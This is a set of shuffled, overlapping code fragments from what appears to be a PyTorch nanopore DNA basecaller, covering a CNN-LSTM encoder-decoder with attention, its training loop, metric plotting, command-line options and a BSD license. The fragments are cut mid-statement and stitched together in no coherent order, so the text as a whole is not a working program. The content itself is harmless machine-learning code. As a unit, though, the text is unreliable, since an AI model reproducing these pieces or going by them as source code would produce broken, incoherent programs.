"unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output",
"self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std,",
"seq len y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs",
"batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\",",
"= np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train',",
"input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val,",
"1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0",
"kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input",
"= {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder =",
"true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT padded",
"if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if",
"batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val,",
"if editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration),",
"ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.)",
"= sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input,",
"args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED",
"# indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val +=",
"cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate =",
"self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\")",
"= matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx] =",
"(seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1)",
"if epoch % print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0,",
"outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our",
"# # old_ed = ed2 # epoch_editd += ed # running_editd_train += ed",
"epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\")",
"locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(),",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val",
"editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5,",
"f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target",
"with 10 reads, kernel size = 11 start = time.time() out12 = trainNet(",
"batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max.",
"0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output",
"updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation',",
"[max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True",
"0.25: # if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio",
"reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch]",
"dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss",
"plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ == '__main__':",
"parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1,",
"{:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={},",
":, i] # batch-i, features, seq len y = y[not_padded_batches, :, :] #",
"= torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for",
"met: 1. Redistributions of source code must retain the above copyright notice, this",
"[batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx,",
"= labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn)",
"= n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start,",
"val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2]",
"dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2))",
"svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val,",
"self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn",
"port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size",
"type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate",
"self.attention = attention self.dropout = dropout # Define the LSTM layer if self.bidirectional:",
"data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val,",
"import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from",
"from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import",
"bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std",
"= (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val +=",
"must reproduce the above copyright notice, this list of conditions and the following",
"x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm",
"= args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF =",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"modification, are permitted provided that the following conditions are met: 1. Redistributions of",
"parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output",
"default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of",
"reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def",
"x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer # shape",
"2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars =",
"#Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\",",
"of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int,",
"heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax =",
"gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate =",
"input_dim] # pack_padded_sequence so that padded items in the sequence won't be shown",
"= (h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq len",
"of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\")",
"distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0: print(\"=\"",
"C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir",
"has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping",
"val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end",
"shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val",
"= np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param =",
"seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim]",
"input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k:",
"the batch if i == max_in_batch: break # when seq length (i) >=",
"= port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3,",
"dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i,",
"int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1",
"acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation ==",
"split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in name and",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax =",
"torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1:",
"encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b,",
"parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port",
"GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 #",
"if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates)",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))),",
"few hundreds, e.g. [batch size] = 32 is a good default value CNN",
"outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and",
"start self.end = end def __eq__(self, other): return self.start <= other <= self.end",
"== 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(),",
"(batch_size, out_dim) #decide if we are going to use teacher forcing or not",
"for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item()",
"n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio",
"the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs)",
"cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization =",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end",
"= y[:, :, i] # batch, features, seq len if self.attention: # ATTENTION",
"hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder",
"if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration",
"sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"and decoder optimizer.step() if (val_ds != None) and (updates % make_validation == 0):",
"earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias",
"dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train",
"val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(),",
"model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={},",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in",
"Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input file.\")",
"3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
"{}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if",
"torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop:",
"argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input",
"list of conditions and the following disclaimer. 2. Redistributions in binary form must",
"if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay,",
"+ (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy =",
"for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early",
"LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self,",
"if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \",",
"features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :,",
"len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m",
"for epoch in p.keys(): if epoch % print_epoch == 0 or epoch ==",
"with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname)",
"return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500,",
"data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size",
"HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,",
"and the following disclaimer in the documentation and/or other materials provided with the",
"lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq,",
"0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val =",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings",
"input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token]",
"Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder",
"teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set",
"= argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle",
"model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in",
"notice, this list of conditions and the following disclaimer in the documentation and/or",
"COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,",
"mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size",
"# undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder",
"type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight",
"forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing",
"import torch.nn.functional as F import torchvision import pickle import random import time import",
"reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) ==",
"for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters():",
"2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio,",
"np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx]",
"self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port",
"lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and",
"def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd:",
"name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234,",
"self.end = end def __eq__(self, other): return self.start <= other <= self.end def",
"self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2",
"return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2],",
"= script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data",
").sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: #",
"parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0,",
"labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### ####",
"outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 # ordering",
"Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size",
"1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in",
"def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val",
"default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500,",
"0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100)",
"in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h",
"= input_decoder[not_padded_batches, :] # get only batches that are NOT padded h =",
"dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if",
"for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] ==",
"else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll",
"= args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder =",
"1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if",
"help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\")",
"true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass",
"out_size # Calculate cross entropy loss # output = (seq*batch, out dim), target",
"acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2))",
"dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p",
"dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc",
"float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing",
"u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in",
"= lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\"",
"label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create",
"val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\")",
"teacher forcing, use actual next token as next input #if not, use predicted",
"labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x",
"save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds))",
"= outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1,",
"LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"lr = args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED)",
"are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :]",
"# batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value =",
"'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1])",
"epoch in p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()):",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train],",
"= n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) #",
"= np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch",
"forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1) c =",
"entropy loss # output = (seq*batch, out dim), target = (seq*batch) # Target",
"a and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by",
"/ math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h,",
"+ 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy:",
"(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF",
"1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim)",
"# break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc =",
"original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx,",
"len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\")",
"\"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx,",
"svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if",
"val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3]",
"= None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,",
"/ float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" * 30)",
"reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias,",
"= args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden",
"on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0",
"= bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm,",
"old_ed # # old_ed = ed2 # epoch_editd += ed # running_editd_train +=",
"+ \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD)",
